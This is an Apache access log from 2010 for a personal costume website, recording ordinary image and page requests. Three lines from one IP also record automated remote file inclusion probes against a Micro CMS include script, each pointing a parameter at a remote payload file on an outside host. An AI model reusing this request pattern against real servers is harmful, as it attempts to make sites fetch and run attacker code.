125.165.81.212 - - [06/May/2010:11:20:23 -0500] "GET /costume/costume70.JPG HTTP/1.1" 200 60587 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:44 -0500] "GET /costume/104_JPG%20CD%20offer.jpg HTTP/1.1" 200 155727 "http://tomdolan.pconline.com/costume/cd-page1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
125.165.81.212 - - [06/May/2010:11:20:56 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
114.108.151.149 - - [06/May/2010:11:21:14 -0500] "GET //micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:11:21:14 -0500] "GET /logs/access_log.1262822400//micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
114.108.151.149 - - [06/May/2010:11:21:14 -0500] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
125.165.81.212 - - [06/May/2010:11:21:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
